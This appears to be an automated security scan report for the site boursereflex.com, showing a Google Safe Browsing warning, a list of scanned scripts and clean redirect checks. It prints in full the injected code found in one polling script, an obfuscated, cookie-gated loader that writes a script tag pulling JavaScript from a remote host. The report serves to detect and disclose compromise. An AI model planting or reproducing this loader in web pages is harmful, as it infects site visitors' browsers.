Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=boursereflex.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://boursereflex.com/ | 200 OK Content-Length: 67925 Content-Type: text/html | clean |
http://boursereflex.com/templates/default/js/pngfix.js | 200 OK Content-Length: 1573 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/loaderSite.js | 200 OK Content-Length: 1174 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/adsense.js | 200 OK Content-Length: 7061 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/ad_dfp.js | 200 OK Content-Length: 1083 Content-Type: application/javascript | clean |
http://boursereflex.com/plugins/flowplayer/flowplayer-3.2.4.min.js | 200 OK Content-Length: 15723 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/libs/modernizr-1.6.min.js | 200 OK Content-Length: 9563 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.js | 200 OK Content-Length: 163855 Content-Type: text/javascript | clean |
http://boursereflex.com/templates/default/js/jquery.easing.js | 200 OK Content-Length: 8301 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/slider.js | 200 OK Content-Length: 10966 Content-Type: application/javascript | clean |
http://boursereflex.com/modules/home/js/interface_home.js | 200 OK Content-Length: 7395 Content-Type: application/javascript | clean |
http://boursereflex.com/modules/sondage/js/interface_sondage.js | 200 OK Content-Length: 3973 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() {
jQuery('input#submit_sondage').click( function() { var coche = false ; var id_choix = 0 ; var id_sond = $('input#sondage_id').val() ; var list = $('div.sondage_reponse input.radio') ; $(list).each(function(){ if(true === $(this).attr('checked')) { coche = true; id_choix = $(this).val() ; } }) ; if(coche == false){ $('d if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://boursereflex.com/templates/default/js/jquery.droppy.js | 200 OK Content-Length: 1669 Content-Type: application/javascript | clean |
http://boursereflex.com/plugins/ClickMap/clickmap.js | 200 OK Content-Length: 1617 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/interface_main_v3.js | 200 OK Content-Length: 38598 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: boursereflex.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 22:24:47 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.4.4-14+deb7u7
GET / HTTP/1.1
Host: boursereflex.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 22:24:47 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.4.4-14+deb7u7
Second query (visit from search engine):
GET / HTTP/1.1
Host: boursereflex.com
Referer: http://www.google.com/search?q=boursereflex.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: boursereflex.com
Referer: http://www.google.com/search?q=boursereflex.com
Result:
The result is similar to the first query. There are no suspicious redirects found.